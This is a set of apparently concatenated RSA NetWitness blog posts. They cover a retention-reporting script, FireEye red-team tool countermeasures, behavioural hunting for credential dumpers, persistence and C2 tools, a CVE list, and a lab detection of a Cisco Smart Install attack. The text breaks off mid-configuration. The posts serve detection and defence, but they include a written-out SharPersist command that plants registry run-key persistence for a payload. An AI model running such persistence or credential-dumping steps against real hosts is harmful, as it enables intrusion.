
Overview

Whether you are looking at retention requirements for compliance, making architecture decisions, or trying to retain a decent investigation history, NetWitness retention is always at the top of these discussions.  As we all find out over time, retention needs to be monitored for trends so informed decisions can be made to meet corporate or regulatory retention requirements.  This article will shed some light on retention in NetWitness Platform systems and demonstrate how to view the retention numbers as a “stack”.  Scroll to the bottom to download the retention script related to this article.

 

Persistence

There are basically two levels of persistence in the NetWitness Platform:

  • Permanent - The final resting place for the data. It is NOT copied to another destination in the platform; e.g., Network/Log Decoder raw packets/logs residing on the Network/Log Decoder.
  • Temporary - Data that is copied (via aggregation) from this location to another device; e.g., a Concentrator consuming meta and session data from a Network/Log Decoder.  The meta and session data is considered temporary because it only needs to reside on the Network/Log Decoder long enough to be consumed by the aggregating Concentrator.

 

Database Types

Below are the database types and the index used by the NetWitness Platform:

  • PacketDB – Raw captured log/network data
    Present on Log/Network Decoders and Archivers
  • MetaDB – Metadata generated from Log/Network Decoder parsing and processing (App Rules/Feeds)
    Present on Log/Network Decoders, Concentrators, and Archivers
  • SessionDB – Data that links the metadata and packet data together into sessions
    Present on Log/Network Decoders, Concentrators, and Archivers
  • Index – Not really a database, but provides a method to look up sessions using meta key values or session IDs

 

NetWitness Systems

Let's take a look at how the database types, persistence, and the retention requirements relate to the individual NetWitness Systems.  

 

Log/Network Decoder

  • PacketDB
    • Permanent resting place (unless a Log Archiver is deployed for the Log Decoder)
      • Meet Your Requirement Retention Days
  • MetaDB
    • Temporary resting place
      • Typically like to see ~30 Days Retention
  • SessionDB
    • Temporary resting place
      • Typically like to see ~30 Days Retention

 

Concentrator

  • MetaDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • SessionDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • Index
    • Permanent Resting Place
      • Meet Your Requirement Retention Days

 

Log Archiver

  • PacketDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • MetaDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • SessionDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • Index
    • Permanent Resting Place
      • Meet Your Requirement Retention Days

 

Log Hybrid Retention

  • PacketDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • MetaDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • SessionDB
    • Permanent Resting Place
      • Meet Your Requirement Retention Days
  • Index
    • Permanent Resting Place
      • Meet Your Requirement Retention Days

 

Interpreting The Numbers

Viewing The "Stack"

When examining retention it is best to evaluate the systems as a "stack".  This will assist in viewing the relationship between the capture devices (Network/Log Decoders) and the upstream consumers (Concentrators) of the data in relation to the corporate goal or regulatory requirement.  The image below shows the NetWitness "stacks" in this particular sample architecture.  Each individual stack is separated by the "----------", so we can see that there are 15 stacks, two of which are archivers.

 

NetWitness All Stacks

 

Determine The Retention

Determine whether your goals or requirements are met by viewing the "Permanent" retention numbers.  *Note: the Archiver permanent numbers are relative to a "Collection" name; there will always be a "default" collection.  If there are other collections, the row for each collection shows that collection's "Permanent" retention numbers.

 

NetWitness All Stacks Showing Permanent and Temp Numbers

 

The Retention Script

Attached is the retention script used to provide the outputs shown above.

The script writes output to files in two text formats and can also send output to a local and/or remote syslog target:

  • Table for console viewing (text format)
  • CSV for use in other programs
  • Syslog (CEF format) sent to a syslog target (unencrypted only - a logger limitation)
  • Output written to /var/log/messages (CEF format)

Requirements

In order for the script file to function as designed, you will need the following prerequisites:

  • Install the NwBackup script, particularly the following scripts:
    • Run get-all-systems11.sh
    • Run ssh-propagate11.sh

Installation

  1. Download the retention script at the end of this article
  2. SSH to the console of the NetWitness Server (Node Zero)
  3. Login as the "root" user
  4. Create the /root/scripts/admin directory
    mkdir /root/scripts
    mkdir /root/scripts/admin
  5. Create the retention directories to store the output files (these are the defaults).
    mkdir /root/retention
    mkdir /root/retention/table
    mkdir /root/retention/csv
  6. Use WinSCP or another client to copy the script to the /root/scripts/admin directory on the NetWitness Server (Node Zero)
  7. Make the script file executable
    chmod +x /root/scripts/admin/netwitness_retention_csv.sh
  8. Edit the script file variable values to match your output directories, syslog server, and number of history days to keep for the CSV and table text files.
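For example, the variable block at the top of the script might end up looking like this (the variable names here are hypothetical - check the script header for the actual names it uses):

    TABLE_DIR="/root/retention/table"    # table text output directory
    CSV_DIR="/root/retention/csv"        # CSV output directory
    SYSLOG_TARGET="192.168.1.50"         # unencrypted syslog destination
    HISTORY_DAYS=30                      # days of CSV/table history to keep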

Manual Execution

  1. SSH to the console of the NetWitness Server (Node Zero)
  2. Login as the "root" user
  3. After you have completed the Installation Steps, type the following command
    /root/scripts/admin/netwitness_retention_csv.sh
  4. You will see output on the console similar to the below

NetWitness Retention Script Output

Crontab Scheduling Instructions

  1. SSH to NetWitness Server (Node-zero)
  2. Login as "root"
  3. Edit crontab
    crontab -e
  4. Add an entry to crontab to execute once every 24 hours at 11pm UTC
     Press the following key:
       Insert
     Add the following text at the top or the bottom of the file:
       ## Retention Script ##
       0 23 * * * /root/scripts/admin/netwitness_retention_csv.sh
     Press:
       ESC
     Type the following keys:
       :wq
     Press:
       ENTER
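Alternatively, the same entry can be appended non-interactively with a one-liner such as this (a sketch; check that it does not duplicate an existing entry first):

    (crontab -l 2>/dev/null; echo '0 23 * * * /root/scripts/admin/netwitness_retention_csv.sh') | crontab -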

 

Additional Notes

Since this data is now passed to /var/log/messages, it can be ingested by the Log Decoder and partially parsed.  There will be a follow-up article on properly parsing it and pulling this data into the Reporting Engine to spot trends.  Due to time constraints I was not able to add it to this article.

As you’ve surely seen, a recently discovered supply chain attack has impacted numerous organizations including corporations, government agencies, and nonprofits.  Information continues to emerge about the massive scope and scale of this attack and related threats.  Unfortunately, events like these illustrate that none of us are immune to attacks, especially when conducted by sophisticated threat actors associated with nation-states.

 

This post is to keep you informed of RSA’s response to this developing situation.  Here’s what we can report:

  • At this point, our investigation has determined that neither RSA nor RSA products use the SolarWinds Orion software affected by the SUNBURST vulnerability announced on December 13th, 2020. RSA will continue coordinating with SolarWinds and our vendors on implementing any appropriate countermeasures and monitoring for appropriate indicators.
  • We are maintaining surveillance of the news and forensic archives regarding the SUNBURST attack on FireEye, which resulted in the theft of its “Red Team” tools for identifying vulnerabilities.  We have implemented countermeasures for the indicators of compromise (IoCs) identified by FireEye within RSA NetWitness Platform, as well as other security tools we use internally.

 

Diving deeper, the links below outline the approach our teams are taking – many of which are deployable to our RSA NetWitness Network and Endpoint tools. We are publicly offering this information to all, including organizations that don’t have RSA NetWitness Network or Endpoint, so that anyone can transpose/map this content into their detection tools.

 

RSA Link (login may be required):

 

There’s also the CVE data included in the GitHub repository that identifies which vulnerabilities these tools were levied against.

 

As always, RSA stands with the cybersecurity industry and our customers in defending against malicious actors like the ones behind this major attack.  If you have questions or concerns, or would like to speak with our technical teams, please let us know and we will coordinate efforts.

Introduction

FireEye recently released a large number of indicators to help security teams identify their set of stolen Red Team tools. The RSA IR team commends FireEye for releasing this information to the security community, to allow all of us to help better defend against attackers who might seek to abuse these tools.

While most security teams will be incorporating these indicators into their existing security detection infrastructure (https://community.rsa.com/community/products/netwitness/blog/2020/12/09/fireeye-breach-implementing-countermeasures-in-rsa-netwitness), the RSA IR team normally takes a different approach to identify threats, which is primarily focused on tool/attack behaviors instead of signatures.

The RSA IR team has long been a proponent of behavioral analysis, which in our experience helps us continuously identify both known and unknown attackers. This analysis philosophy, coupled with an “Assume Breach” mindset, is at the core of Threat Hunting and Incident Response within our team. Therefore, in this blog we will look at the behavioral aspects of the tools related to the FireEye release of indicators, and provide some examples of how identifying suspicious behaviors can help identify attacker activity without the need for specific signatures.

 

Credential Dumping

Adversaries attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a cleartext password, from the operating system and software.

 

SafetyKatz

SafetyKatz is an open source tool, which is available on GitHub (https://github.com/GhostPack/SafetyKatz). It is an all-inclusive LSASS password dumper. This tool will dump the memory of the LSASS process using the Windows API call MiniDumpWriteDump, then load a custom C# implementation of Mimikatz to pull information from the dump, subsequently deleting the LSASS dump file when it is finished.

 

Executing SafetyKatz on a host with NetWitness Endpoint, we can easily detect its usage via a number of indicators. From the screenshot below, we can see that NetWitness flags the file as malicious, based on RSA's file reputation lookup service. Furthermore, the agent generates metadata based on the behavior of the tool itself under the Behaviors of Compromise meta key, which is an unsigned application opening LSASS. Depending on how an attacker may use this tool, other generic behaviors, such as the location and name of the binary itself, can be part of the overall characteristics of this behavior. These behaviors should immediately stand out as suspicious and warrant further triage:

To configure file reputation lookup, please refer to the following article: Context Hub: Configure Live Connect as a Data Source.


 

Executing the YARA rule from FireEye against the SafetyKatz binary, we can see that we indeed get a hit:

 

 

AndrewSpecial

This tool is similar to SafetyKatz in that it is open source (https://github.com/hoangprod/AndrewSpecial) and will create a dump file of the LSASS.exe process using the MiniDumpWriteDump Windows API call. It will not, however, extract credentials from the dump created. From the screenshot below, you can see that the tool exhibits the same behaviour as SafetyKatz, in that it is an unsigned tool opening LSASS. This tool, again running from an unexpected directory, should stand out to defenders and warrant further triage:

 

Executing the YARA rule from FireEye against the AndrewSpecial binary, we can see that we indeed get a hit:

 

 

Closing Notes

The important takeaway from these two tools is that simply relying on atomic indicators of compromise, such as signatures, which the attacker can easily avert, is not a scalable, easily maintained approach to detection. Instead, by relying on the behaviours of these tools and how they have to operate in order to achieve their goal, such as opening a handle to LSASS in order to dump its memory, we can easily detect even seldom-used and unknown tools.

 

 

Discovery

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act.

 

SharpHound

In addition to NetWitness Endpoint flagging the tool's presence as malicious, we can still detect unwarranted tools being introduced into an environment through daily hunting. NetWitness Endpoint has two meta keys, dir.path.src and dir.path.dst, that group files running out of certain directories. As defenders, we can then pivot into interesting locations and look for suspicious executables running from suspicious locations with ease:

 

 

For example, pivoting on dir.path.dst = 'uncommon', we can look at all the files being executed out of uncommon directories. From the below we can see that cmd.exe was used to launch a suspect binary from C:\PerfLogs\ named shp.exe:

 

This is a useful tactic for finding malicious tools, as attackers typically (but not always) do not run their tools from the user's Desktop.

 

Closing Notes

Sometimes it is not about having a signature to detect the tool and how it works, but rather to find the tool based on anomalous characteristics of its execution, such as it running from a suspect location. Discovery tools are constantly evolving and adapting to evade detection, meaning signatures for them can easily become obsolete.

 

Lateral Movement

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it.

 

Impacket

Part of the FireEye indicators included references to Impacket tools (https://github.com/SecureAuthCorp/impacket) such as smbexec. As part of our Profiling Attackers Series, two of these tools that aid in lateral movement have already been covered in previous RSA blogs, which we recommend you read:

 

 

However, it is worth mentioning a new feature in NetWitness that has been added since the release of those blogs: NetWitness has now introduced host-based information matched to the packet data. If you have both NetWitness Packets and NetWitness Endpoint, as of 11.5.1 packet sessions will be enriched with the associated host-based data, giving defenders the full picture from both the endpoint and the network perspective:

 

To configure and learn more see the following article: https://community.rsa.com/docs/DOC-86987#Host


 

Closing Notes

In order for an attacker to achieve their end goal, they are going to have to move laterally to other endpoints. While tools such as Impacket have been developed to make this task easier, as shown by the FireEye breach, these tools can be obfuscated to easily evade signatures. As shown in the blog posts above, by relying on the behaviors of the tools we can ensure that we will always identify their usage.

 

Persistence

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

 

ZeroLogon

This is an exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass. Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise.

 

One of our content developers, William Motley, updated the DCERPC Lua parser when this vulnerability was initially announced to detect this behavior on the network. This parser will generate the meta value zerologon attempt under the ioc meta key when the behavior is observed. Prior to the update of the DCERPC parser, the ZeroLogon CVE was covered by Halim Abouzeid, and his post is a recommended read showing how these exploits can be detected without signatures:

 

 

SharPersist

This is a custom tool developed by FireEye, and is freely available on GitHub (https://github.com/fireeye/SharPersist). This tool makes it incredibly quick and easy to set up persistence on an endpoint. We ran some of the mechanisms it offers on one of our victim hosts to see what meta values NetWitness creates.

 

One of the switches for the tool adds persistence via the registry using the \CurrentVersion\Run key. The following query can be used to identify any application persisting itself in this manner:

action = 'createregistryvalue' && ec.subject = 'runkey'
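For reference, a SharPersist invocation that creates such a run key looks roughly like the following (flags per the project's README; the payload path and value name are illustrative):

    SharPersist.exe -t reg -c "C:\PerfLogs\payload.exe" -k "hkcurun" -v "Updater" -m add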


 

 

Autoruns (i.e. persistent files) also have their own section for each endpoint. These can be reviewed in order to identify potentially malicious autoruns based on various characteristics of the file, such as signed/not signed, frequency in the network, location, etc. The screenshot below shows a malicious registry autorun:

 

 

The screenshot below shows a malicious service:

 

 

The screenshot below shows a malicious task:

 

 

You should also be collecting the Windows logs from your endpoints, as these can be used to help identify malicious autoruns. Querying events where reference.id = '7045' will show newly created services; these should be analysed to find potentially malicious services. From the below screenshot we can see that a suspect service was created referencing a binary in a suspect location:

 

Executing the YARA rules from FireEye against the SharPersist binary, we can see that we indeed get a hit:

 

Closing Notes

Again we have shown that regardless of the tools being used, the persistence mechanisms can all be detected based on the behavior of the service/task/autorun as well as the characteristics of the file behind the persistence mechanism.

 

 

Command and Control

Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

 

DShell

We executed one of the tools identified by FireEye as DShell (a backdoor) to see what indicators we could use to identify its usage within an environment. What we noticed was that the tool adds itself and its C2s as an exception in the firewall using netsh.exe; this gets identified by NetWitness Endpoint with the two meta values shown below:

 

 

It should be noted that in general, any C2 type file will exhibit additional behaviors once it is used to do something useful, such as upload/download files, enumerate processes/services/file system, etc. Here, we are simply executing it to observe its initial behavioral footprint.

 

Navigating to the events view we can see that the binary was located in C:\PerfLogs\ and named Program.exe. It spawned cmd.exe and passed the netsh argument to it:

 

 

This is a common tactic for many C2s; njRAT, for example, will do the same, albeit with a slightly different command. The njRAT execution on ANY.RUN exhibiting the same behavior can be found at the following link: https://app.any.run/tasks/7d09956b-6843-45f6-8bbf-5a5880999961/. This again shows that utilising the behaviour of the tool allows defenders to identify its usage, and that of similar tools, without having to rely on signatures.

 

Executing the YARA rule from FireEye against the DShell binary, we can see that we indeed get a hit:

 

 

Cobalt Strike / Meterpreter / DNS Tunnelling

A number of the signatures released by FireEye reference Cobalt Strike, Meterpreter, and DNS tunnelling. While we have covered these tools in prior posts, some of the network detection discussed in them cannot be directly applied to the tools released by FireEye; this is because tools such as Cobalt Strike allow for malleable profiles that can easily be altered. With that being said, the hunting principles outlined in our Profiling Attackers Series, whereby we hunt for these tools based on behaviours, show that they can still be detected via proactive hunting:

 

 

 

Closing Notes

We have discussed hunting for C2s a number of times in other blog posts. Due to their flexibility and ability to change dynamically, it is seldom useful to employ signatures for their detection. Instead, identifying suspect characteristics associated with the communication can make them stand out even when they attempt to blend in:

 

 

 

Conclusion

The key takeaway from this post is that while signatures are an easy way to detect known malicious tools/files, they are not ideal for defending today's networks against more sophisticated attacks. The intrusion into FireEye's network itself demonstrates this fact. The RSA IR team's philosophy is to assume a breach and use daily hunting to identify abnormal behaviors in your network. We also always encourage our clients to invest in hunters who use our toolset to "patrol" the network from both the packet and endpoint perspectives. Sole reliance on signatures and the alerts generated by them will only protect you from known attacks. Signatures can typically be averted easily and become stale rather quickly. Behaviors, on the other hand, are more generic and fairly static, and will always allow you to detect what the signatures would have detected as well as malware not covered by signatures.

I'm certain everyone reading this was just as shocked by the recent news about the FireEye breach as I was and is diligently trying to assess their current security posture in light of this information. As we at RSA validate and improve our coverage based upon the disclosed data, let us all not miss the larger picture at hand. By focusing on the details within FireEye's blog posts and GitHub countermeasures repository, we can digest the information published to make a dedicated plan for identifying the vulnerabilities these tools exploit and detecting use of the tools themselves within our environments.

 

It would be easy to miss what I consider a secondary information goldmine due to the sheer volume of signatures cataloged in various formats, and that is the prioritized list of vulnerabilities. Overall, there were 16 related Common Vulnerabilities and Exposures (CVEs) FireEye posted to GitHub which contain multiple remote code execution procedures for various platforms (to include Citrix, Manage Engine, and Confluence) and a few privilege escalation mechanisms:

  • CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0
  • CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 10.0
  • CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN - CVSS 9.8
  • CVE-2018-15961 – RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell) - CVSS 9.8
  • CVE-2019-0604 – RCE for Microsoft Sharepoint - CVSS 9.8
  • CVE-2019-0708 – RCE of Windows Remote Desktop Services (RDS) - CVSS 9.8
  • CVE-2019-11580 - Atlassian Crowd Remote Code Execution - CVSS 9.8
  • CVE-2019-19781 – RCE of Citrix Application Delivery Controller and Citrix Gateway - CVSS 9.8
  • CVE-2020-10189 – RCE for ZoHo ManageEngine Desktop Central - CVSS 9.8
  • CVE-2014-1812 – Windows Local Privilege Escalation - CVSS 9.0
  • CVE-2019-3398 – Confluence Authenticated Remote Code Execution - CVSS 8.8
  • CVE-2020-0688 – Remote Command Execution in Microsoft Exchange - CVSS 8.8
  • CVE-2016-0167 – local privilege escalation on older versions of Microsoft Windows - CVSS 7.8
  • CVE-2017-11774 – RCE in Microsoft Outlook via crafted document execution (phishing) - CVSS 7.8
  • CVE-2018-8581 - Microsoft Exchange Server escalation of privileges - CVSS 7.4
  • CVE-2019-8394 – arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus - CVSS 6.5

 

What does all of this mean to us? The beauty is that we can lower our overall threat profile and take a risk-driven approach by calculating the current risk within our organizations: reviewing vulnerability scan data, developing an action plan for patching assets vulnerable to these CVEs, and continuing to assess the situation with an increased risk register applied to the items listed above (remembering asset + threat + vulnerability = risk). This may be a good time to consider a proactive attitude toward integrating this extremely valuable data into a SOAR solution that can ingest, categorize, report, and respond to these indicators in an automated, vendor-agnostic fashion through robust integrations (e.g., RSA NetWitness Orchestrator).

 

I would also be remiss if I didn’t take the opportunity to discuss the exemplary effort made by Lee Kirkpatrick in his ‘Profiling Attackers Series’ where he covers many of the exploitation frameworks FireEye leveraged as part of their red-team engagements. We know the vast majority (approximately 83%) of these disclosed tools were free and open-source projects and these posts go through a great deal of information on how to detect this nefarious activity within your environments.

 

At RSA we strive to provide cutting-edge technologies that not only offer unparalleled endpoint, log, network, and behavioral visibility to detect and respond to emerging threats, but also provide updated content whenever available to make our customers’ jobs easier and their efforts more impactful. This is no exception. For more information, please see our post highlighting initial detections: FireEye Breach - Implementing Countermeasures in RSA NetWitness.

What Happened

On December 8th, 2020, FireEye announced that it had been the victim of a cyber attack perpetrated by an advanced nation state actor.  They've disclosed their research into the attack in a few places, including: 

 


https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html
 


As part of the breach, a large number of FireEye's Red Team tools were exposed to the attackers.  FireEye very quickly published a large set of countermeasures for the global community to use in detecting malicious use of these tools, including:

  • Yara Signatures
  • Snort Signatures
  • FE Helix Signatures
  • ClamAV Signatures

 

All of these can be found in their GitHub repository, here:  GitHub - fireeye/red_team_tool_countermeasures

 

Implementing Countermeasures in RSA NetWitness 

There are no silver bullets when it comes to detecting and responding to threats of any nature, let alone ones executed by advanced-capability actors.  It's important for organizations to take a holistic approach, manage and prioritize patching, and continue to evolve their proactive hunting capabilities.  To that end, please take a look at a couple of other blog posts from our field teams discussing their approach and the capabilities that already exist in the NetWitness Platform to help respond to this situation and detect usage of some of the malicious toolkit:

 

FireEye Breach - Beyond the signatures  - A great post from our Threat Hunting team discussing overall approach and the exploited vulnerabilities.

FireEye Breach  - A great post from our IR team talking about the existing NetWitness visibility into many of the tools implicated in the attack.

 

In addition to those, we do want to ensure we can guide customers through the relevant detection opportunities, whether re-purposing the existing countermeasures published by FireEye (and others) or developing detections native to the RSA NetWitness platform.  We are working through this process right now and will update this page accordingly if/as we learn more.  As a start, please consider the following implementation of the provided Snort and Yara Signatures:

 

Snort Rules

As of 11.5, we have a much improved and expanded ability to deploy snort signatures.  FireEye has published this set of snort signatures to detect related activity on the network: https://raw.githubusercontent.com/fireeye/red_team_tool_countermeasures/master/all-snort.rules 

 

These rules can be uploaded to Network Decoders by following the instructions here: https://community.rsa.com/docs/DOC-96852#Configur 

 

From here, any matches on any of the signature IDs (captured in the sig.id meta key) can be queried in Investigate via: sig.id=25894,25893,25874,25881,25879,25848,25887,25873,33355045,25872,25890,25892,25878,25891,25857,25880,25885,25900,62010239,25886,25875,25889,25877,25888,25884,25902,25866,25899,25882,25876,25901,25849,100001,25850

 

You may also consider creating an app rule on the decoder to create a single additional meta value when the above condition holds true, simplifying the subsequent search condition and ESA alert logic (if you choose to create an alert). An example of a manually created ESA Alert for any matches against that snort signature set is below:
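As a sketch, such an app rule could be defined as follows (the rule name is illustrative; the condition is the full sig.id list from above):

    Rule Name:  fireeye_redteam_snort_hit
    Condition:  sig.id = 25894,25893,...   (paste the complete list from above)
    Alert On:   alert                      (writes the rule name into the alert meta key)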

 

 

Yara Signatures

Customers who have the Malware Analysis component can deploy the Yara signatures FireEye has published here: https://github.com/fireeye/red_team_tool_countermeasures/blob/master/all-yara.yar

 

Instructions on enabling this custom Yara content on a Malware Analysis appliance can be found here: MA: Enable Custom YARA Content 

 

We will continue to update this blog post with additional information relating to these countermeasures as we have it.


Simple RCE

The attack: CVE-2018-0171 (Cisco Smart Install RCE). We will simply be pulling the startup-config. This CVE can be exploited to do more damage but that is not the point of this post.

Why is this simple? Well, this exploit has public proof-of-concept code available, it requires no authentication, and it can be executed externally.

Why should you care? Based on some crude Shodan searches, there are tens of thousands of externally facing switches (most of which are in the U.S.) that are potentially vulnerable to this exploit. A good friend of mine brought this exploit up to me based on results from a recent penetration test, which tells me that this attack is still relevant.

Quick Tips

  1. Don't test this exploit outside of a lab.
  2. The contents of the video are educational only, and as the owner of the switch, I consented to pwning it.

 

Finding Abnormal Traffic

This is a packets-only post. In my lab I have captured the attack from a Kali box (10.1.1.20) that is external to the switch (192.168.10.254), via a span port on the switch that was abused (ironic, eh?). The switch is not internet-facing for obvious reasons, but Kali is on a network external to the switch to simulate an external attack.

 

The first step is to understand your network. As an analyst, you should understand the network you are protecting (this knowledge comes over time). This is important because you need to be able to find the traffic that does not fit into the normal flow. For instance, you most likely won't see TFTP being used often legitimately, as the traffic is cleartext; you're more likely to see SCP or SFTP. That makes TFTP an investigation point, even if the traffic appears harmless.

 

In this lab, I'd expect to see SSL, DNS, NTP, HTTP, and SSH as part of the normal flow. When starting to look for abnormal traffic, pick a direction. Picking a direction is easy if you have traffic flow direction set up.

As a consultant, one of the first things I like to set up once an environment is deployed is "Traffic Flow". You can find this under the Live Content tab by searching for "traffic flow". It will need to be configured with internal/external subnet information to function. Please let us know if you want more information on that piece.

By picking a direction, we have narrowed the scope of the hunt; looking at all the data is like finding a needle in a haystack. Since we are looking for an external attack, I selected inbound traffic. As Kali is external to the switch's LAN, any connection made by Kali to the switch will show up in this traffic direction. Immediately, in the screenshots above, TFTP stands out. TFTP is a UDP transfer protocol on port 69. In my lab this is abnormal, but TFTP does exist in some environments, so its presence by itself is not indicative of an attack; it is, however, a point of investigation. By clicking the green (1) next to TFTP we can view the event and reconstruct the packet.

Clearly, something isn't right here. We have a few different breadcrumbs to follow.

  1. Why is a startup-config file from a Cisco switch moving in cleartext across the network?
  2. Why is it moving outside the LAN?
  3. What is 10.1.1.20?

Without pre-existing knowledge of the attack, I'd start by answering these questions. We can go about this a couple of ways: you can take a gamble on the CVE showing up in a vulnerability scanner, or we can piece together what happened. I'm starting by investigating 10.1.1.20. If you're new to NetWitness, you can further the investigation by tacking on another query in the Investigate view. The idea here is to carve out the data we don't need so that we get closer to finding the information we do.
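For example, a follow-up query in this lab could look like this (addresses from the lab setup above; service = 0 is the OTHER bucket discussed next):

    ip.src = 10.1.1.20 && service = 0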

Seeing traffic in OTHER can often turn into a rabbit hole of data, but looking at it once it has been carved down a bit can often lead to interesting information. By reconstructing the packet the same way as before, we can see relevant data: a TCP connection on port 4786 (Cisco Smart Install) and what appears to be a remote command calling for the startup-config we saw transferred over the wire. We can look at this at a more granular level via the web tab.

I personally think the Hex view is the most useful, and we can see most of the same information here as before. Although not necessarily more useful in this specific scenario, you'll find it easier to reconstruct fragmented packets (like those found in the more recent Bad Neighbor exploit) in this view. The default view will also try to reconstruct any web pages.

So far we know that an external device pulled the startup-config file from the switch via TFTP after an initial TCP connection on port 4786. This is enough information to do a Google search, and the query "cisco port 4786" will give you plenty of results on the exploit you just witnessed. It's fair to say that the switch was attacked, but your job doesn't end there. We saw a password in cleartext and the presence of inbound HTTP traffic, which tells me that this switch most likely has a web GUI. Using the same steps as above, we can look at the HTTP traffic.

 

Some pieces of web content will automatically be reconstructed while investigating.

 

While looking at the event meta for the HTTP traffic, it is pretty clear that a login attempt was made.

At this point we have a compromised device. This is the part where remediation begins and an incident report gets created. This is also where, as analysts, we begin to think about how to make our response faster in the future. This attack did not show up in the Cisco logs. Depending on your organization's size, you may have multiple devices that are vulnerable to the same attack (hopefully not many externally facing). This becomes tricky and time-intensive for large organizations with network devices spread across multiple sites. We also don't want to make a routine of checking for this attack every day going forward. Part of remediation should be to take an inventory of devices at risk and create a plan to mitigate the threat, but that can take time, and we need to monitor until that process is complete. We have other threats to look for, and the point of NetWitness is to save you valuable time. To help monitor the threat during remediation, we can create an alert to fire based on set criteria.

 

Content Creation

Part of an analyst's role is to be proactive rather than solely reactive. To help monitor the situation created by this hunt, we can create content to alert us when a possible attack is detected. By automating this task, we can spend more time looking for other threats. This section will cover creating a basic ESA rule to create an alert. The bonus section will cover extending functionality with NetWitness Logs, a simple Shodan integration, and a simple Censys integration. 

 

ESA Rule Builder

The most effective way to handle this threat will be creating an ESA Correlation Rule. We can do this by heading to the configuration section on the NetWitness main navigation bar. From there, you can click on "ESA Rules" as depicted below and you'll see the rule library by default. The view on versions earlier than 11.5 will be slightly different. Instead of icons, the word "Configure" will be in the top navigation bar.

11.5 ESA

At this point we can create a new rule using the rule builder.

The rule name will be what shows up in Respond and is also what we will use for the log aspect further down. I personally use CVE names when I can; the reason is that there are a lot of threats, and looking up the CVE is quicker when the alert is named after it. We will utilize this further down with a Shodan lookup. Always enable "Trial Rule" for a new rule; it will protect the ESA from crashing if a bad rule is created. We do want to alert off the rule, so ensure that option is checked (it should be by default), and adjust the severity to your organization's guidelines. Once that is done, we will add two conditions, as this attack had two distinct criteria.

The first condition will look for Cisco Smart Install connections on TCP port 4786. Based on what was seen in the investigation, the attack starts with a connection to 4786 and is immediately followed by the TFTP transfer over UDP port 69.

The second condition will look for TFTP traffic.

Once that is complete, we need to configure more information for the conditions. On the first condition, set the "Connector" to "followed by", the "Correlation Type" to "SAME", and the "Meta" to "ip_dst". The "followed by" connector means what the name implies; it differs from an "AND" type in that the following condition must occur after the first. We group by "ip_dst" so that, in the event you have multiple switches attacked at the same time, the alerts are organized by each device. Due to the immediate TFTP transfer, we will set the "Occurs Within" to 1 minute.
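In summary, the rule logic looks like this (tcp.dstport and service are standard packet meta keys; ip_dst is the ESA spelling of the grouping meta):

    Condition A:  tcp.dstport = 4786     (Cisco Smart Install connection)
      followed by (Correlation Type: SAME, Meta: ip_dst, Occurs Within: 1 minute)
    Condition B:  service = 69           (TFTP transfer)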

 


Optional: If you have a SIEM, you can send the alert to the SIEM via syslog. This requires that a syslog server is configured in the global notification settings under the system settings in the administration menu.

At this point, we can save the rule. If you click "Show Syntax", you will be able to see the Esper syntax; this is the format in which advanced rules are written. When you hit save, if there is an issue with the rule, it will not save, and the issue will be highlighted in red. Once the rule is created, it needs to be added to a deployment.

If the attack is detected again, it will show up in Respond as shown in the video below.

 

Bonus

We will extend the base functionality in a couple of ways. The first is a fun trick I picked up for when NetWitness Logs is also in the environment. As seen in the ESA Rule Builder, the rule can send a notification via syslog. In this instance, I configured my Endpoint Log Hybrid as a syslog server destination, so when the ESA rule triggers, a notification is sent to the Log Decoder service as syslog. A NetWitness Log Decoder will parse syslog sent by another NetWitness appliance (the ESA in this case) by default and will identify the source accordingly, as seen below (look at "Device Type"). The important fields here are "Device Type" and "Event Description". With these fields, we can create an app rule on the Log Decoder that will populate the "alert" meta with the CVE name.

Decoder App Rule

On 11.5, the admin settings are accessible via the tools icon on the right-hand side of the navigation bar. On all other 11.x versions, there is an Admin tab on the navigation bar. Once there, go to Services and open the Log Decoder's config page.

Make sure that you use the same name as the ESA rule; this way, when you see the alert, you'll know exactly what triggered it. Earlier I mentioned how I like to use CVE names for this kind of content. Part of the reason is that there are an enormous number of CVEs in existence, and a shortcut I came up with was to integrate with Shodan's exploit lookup.
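A sketch of that app rule (the device.type value shown is illustrative - copy the exact Device Type and Event Description values you observe in Investigate):

    Rule Name:  cve-2018-0171
    Condition:  device.type = 'rsasecurityanalytics' && event.desc = 'cve-2018-0171'
    Alert On:   alert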

We can accomplish this by setting up a context menu action. This is completed in the administration menu and only needs to be completed once per meta value. So going forward, we will be able to right-click a value in the alert meta and look it up in Shodan. 

Add a new menu option by clicking on the red plus sign and edit the values as below. You will need to use your own Shodan API key.
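As a sketch, following the URL context action format from the RSA context menu documentation (the id, displayName, and urlFormat are illustrative; cssClasses names the meta key the action appears on):

    {
      "displayName": "Shodan Exploit",
      "cssClasses": ["alert"],
      "type": "UAP.common.contextmenu.actions.URLContextAction",
      "version": "1",
      "modules": ["investigation"],
      "local": "false",
      "groupName": "externalLookupGroup",
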